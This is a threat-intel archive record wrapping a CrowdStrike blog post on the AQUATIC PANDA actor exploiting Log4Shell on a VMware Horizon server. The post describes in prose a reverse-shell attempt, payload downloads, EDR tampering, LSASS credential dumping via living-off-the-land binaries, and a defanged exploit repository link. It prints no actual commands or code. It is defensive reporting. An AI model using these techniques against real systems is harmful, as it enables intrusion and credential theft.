{
	"id": "7e85fd4a-e6e5-4987-9d61-6abd05fc2682",
	"created_at": "2026-04-06T00:21:20.529175Z",
	"updated_at": "2026-04-10T03:34:51.681947Z",
	"deleted_at": null,
	"sha1_hash": "d40c26ee51639e6191e332eeb6430cf3c5ade68e",
	"title": "AQUATIC PANDA in Possession of Log4Shell Exploit Tools | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1988147,
	"plain_text": "AQUATIC PANDA in Possession of Log4Shell Exploit Tools |\r\nCrowdStrike\r\nBy Benjamin Wiley and the Falcon OverWatch Team\r\nArchived: 2026-04-05 18:15:07 UTC\r\nFollowing the Dec. 9, 2021, announcement of the Log4j vulnerability, CVE 2021-44228, CrowdStrike Falcon®\r\nOverWatch™ has provided customers with unrivaled protection and 24/7/365 vigilance in the face of heightened\r\nuncertainty.\r\nTo OverWatch, Log4Shell is simply the latest vulnerability to exploit — a new access vector among a sea of many\r\nothers. Adversarial behavior post-exploitation remains substantially unchanged, and it is this behavior that\r\nOverWatch threat hunters are trained to detect and disrupt. OverWatch’s human-driven hunting workflows and\r\npatented tooling make it uniquely agile in the face of rapidly evolving cyber threats.\r\nSince the vulnerability was announced, OverWatch threat hunters have been continuously ingesting the latest\r\ninsights about the Log4j vulnerability as well as publicly disclosed exploit methods to influence their continuous\r\nhunting operations. On Dec. 14, 2021, VMware issued guidance around elements of VMware’s Horizon service\r\nfound to be vulnerable to Log4j exploits. This led OverWatch to hunt for unusual child processes associated with\r\nthe VMware Horizon Tomcat web server service during routine operations.\r\nOn the back of this updated hunting lead, OverWatch uncovered suspicious activity stemming from a Tomcat\r\nprocess running under a vulnerable VMware Horizon instance at a large academic institution, leading to the\r\ndisruption of an active hands-on intrusion. Thanks to the quick action of OverWatch threat hunters, the victim\r\norganization received the context-rich alerts they needed to begin their incident response protocol.\r\nOverWatch’s Rapid Notification Process Disrupts AQUATIC PANDA\r\nOverWatch threat hunters observed the threat actor performing multiple connectivity checks via DNS lookups for\r\na subdomain under dns\u003c.\u003e1433\u003c.\u003eeu\u003c.\u003eorg , executed under the Apache Tomcat service running on the VMware\r\nHorizon instance. OverWatch has observed multiple threat actors utilizing publicly accessible DNS logging\r\nservices like dns\u003c.\u003e1433\u003c.\u003eeu\u003c.\u003eorg during exploit attempts in order to identify vulnerable servers when they\r\nconnect back to the attacker-controlled DNS service.\r\nFigure 1. Initial suspicious reconnaissance commands identified by OverWatch\r\nThe threat actor then executed a series of Linux commands, including attempting to execute a\r\nhttps://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\r\nPage 1 of 5\n\nbash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve\r\nthreat actor tooling hosted on remote infrastructure. Our CrowdStrike Intelligence team later linked the\r\ninfrastructure to the threat actor known as AQUATIC PANDA. (Read more about AQUATIC PANDA at the end of\r\nthis post.) The execution of Linux commands on a Windows host under the Apache Tomcat service immediately\r\ndrew the attention of OverWatch threat hunters. After triaging this initial burst of activity, OverWatch immediately\r\nsent a critical detection to the victim organization’s CrowdStrike Falcon® platform and shared additional details\r\ndirectly with their security team.\r\nFigure 2. Failed attempts to execute Linux commands on a Windows host\r\nBased on the telemetry available to OverWatch threat hunters and additional findings made by CrowdStrike\r\nIntelligence, CrowdStrike assesses that a modified version of the Log4j exploit was likely used during the course\r\nof the threat actor’s operations.\r\nFigure 3. Suspected Log4j\r\nexploits found in AQUATIC PANDA’s possession\r\nUsing the telemetry discovered through intelligence analysis of the JNDI-Injection-Exploit-1.0.jar file,\r\nOverWatch was able to confirm that the same file was released on a public GitHub project on Dec. 13, 2021, as\r\nseen in Figure 4 below, and was potentially utilized in order to gain access to the vulnerable instance of VMware\r\nHorizon based on follow-on activity observed by OverWatch.\r\nhttps://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\r\nPage 2 of 5\n\nFigure 4. GitHub project with Log4j exploit — hxxps\u003c:\u003e//github\u003c.\u003ecom/dbgee/log4j2_rce (Click to enlarge)\r\nAQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current\r\nprivilege levels as well as system and domain details. OverWatch threat hunters also observed an attempt to\r\ndiscover and stop a third-party endpoint detection and response (EDR) service.\r\nOverWatch continued to track the threat actor’s malicious behavior as they downloaded additional scripts and then\r\nexecuted a Base64-encoded command via PowerShell1 to retrieve malware from their toolkit. OverWatch\r\nobserved the threat actor retrieve three files with VBS file extensions from remote infrastructure. These files were\r\nthen decoded using cscript.exe into an EXE, DLL and DAT file respectively. Based on the telemetry available,\r\nOverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking.2\r\n Finally, OverWatch observed AQUATIC PANDA make multiple attempts at credential\r\nharvesting by dumping the memory of the LSASS process3 using living-off-the-land binaries rdrleakdiag.exe\r\nand cdump.exe — a renamed copy of createdump.exe . The threat actor used winRAR to compress the memory\r\ndump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the\r\nProgramData and Windows\\temp\\ directories.\r\nhttps://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\r\nPage 3 of 5\n\nFigure 5. Example command line used in attempted memory dump\r\nFigure 6. Falcon platform telemetry capturing threat actor actions\r\nThroughout the intrusion, OverWatch tracked the threat actor’s activity closely in order to provide continuous\r\nupdates to the victim organization. Based on the actionable intelligence provided by OverWatch, the victim\r\norganization was able to quickly implement their incident response protocol, eventually patching the vulnerable\r\napplication and preventing further threat actor activity on the host.\r\nThe discussion globally around Log4j has been intense, putting many organizations on edge. No organization\r\nwants to hear about such a potentially destructive vulnerability affecting its networks. It is in these times of great\r\nuncertainty that the true value of continuous threat hunting is brought to light. OverWatch searches for evidence of\r\nmalicious behavior — not adversary entry points. Although new vulnerabilities present adversaries with a new\r\nentry vector, they do not change the hands-on-keyboard activity OverWatch threat hunters are trained to detect and\r\ndisrupt.\r\nTo stay current on how to protect against this latest vulnerability, CrowdStrike’s overall mitigation advice for\r\nLog4j is being updated as new information comes to light.\r\nAQUATIC PANDA is a China-based targeted intrusion adversary with a dual mission of intelligence collection\r\nand industrial espionage. It has likely operated since at least May 2020. AQUATIC PANDA operations have\r\nhttps://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\r\nPage 4 of 5\n\nprimarily focused on entities in the telecommunications, technology and government sectors. AQUATIC PANDA\r\nrelies heavily on Cobalt Strike, and its toolset includes the unique Cobalt Strike downloader tracked as\r\nFishMaster. AQUATIC PANDA has also been observed delivering njRAT payloads to targets.\r\nEndnotes\r\n1. Learn more about this technique at https://attack.mitre.org/techniques/T1132/001/ and\r\nhttps://attack.mitre.org/techniques/T1059/001/.\r\n2. Learn more about this technique at https://attack.mitre.org/techniques/T1574/001/.\r\n3. Learn more about this technique at https://attack.mitre.org/techniques/T1003/001/.\r\nAdditional Resources\r\nVisit the CrowdStrike Log4j Vulnerability Learning Center.\r\nAccess the CrowdStrike Archive Scan Tool (CAST).\r\nDownload the CrowdStrike Log4j Quick Reference Guide.\r\nLearn about the powerful, cloud-native CrowdStrike Falcon® platform.\r\nGet a full-featured free trial of CrowdStrike Falcon® Prevent™ to see for yourself how true next-gen AV\r\nperforms against today’s most sophisticated threats.\r\nSource: https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\r\nhttps://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/"
	],
	"report_names": [
		"overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "19935e32-f1a5-462d-8934-8b1c3bf3b5f2",
			"created_at": "2022-10-25T16:07:23.36465Z",
			"updated_at": "2026-04-10T02:00:04.565476Z",
			"deleted_at": null,
			"main_name": "Aquatic Panda",
			"aliases": [
				"G0143"
			],
			"source_name": "ETDA:Aquatic Panda",
			"tools": [
				"Agentemis",
				"Bladabindi",
				"Cobalt Strike",
				"CobaltStrike",
				"Fishmaster",
				"JollyJellyfish",
				"Jorik",
				"cobeacon",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ba3eea09-ce30-4cfa-ae3a-b5992c4b81f8",
			"created_at": "2022-10-25T15:50:23.441443Z",
			"updated_at": "2026-04-10T02:00:05.263145Z",
			"deleted_at": null,
			"main_name": "Aquatic Panda",
			"aliases": [
				"Aquatic Panda"
			],
			"source_name": "MITRE:Aquatic Panda",
			"tools": [
				"Wevtutil",
				"Winnti for Windows",
				"njRAT",
				"Cobalt Strike",
				"ShadowPad",
				"Winnti for Linux"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434880,
	"ts_updated_at": 1775792091,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d40c26ee51639e6191e332eeb6430cf3c5ade68e.pdf",
		"text": "https://archive.orkl.eu/d40c26ee51639e6191e332eeb6430cf3c5ade68e.txt",
		"img": "https://archive.orkl.eu/d40c26ee51639e6191e332eeb6430cf3c5ade68e.jpg"
	}
}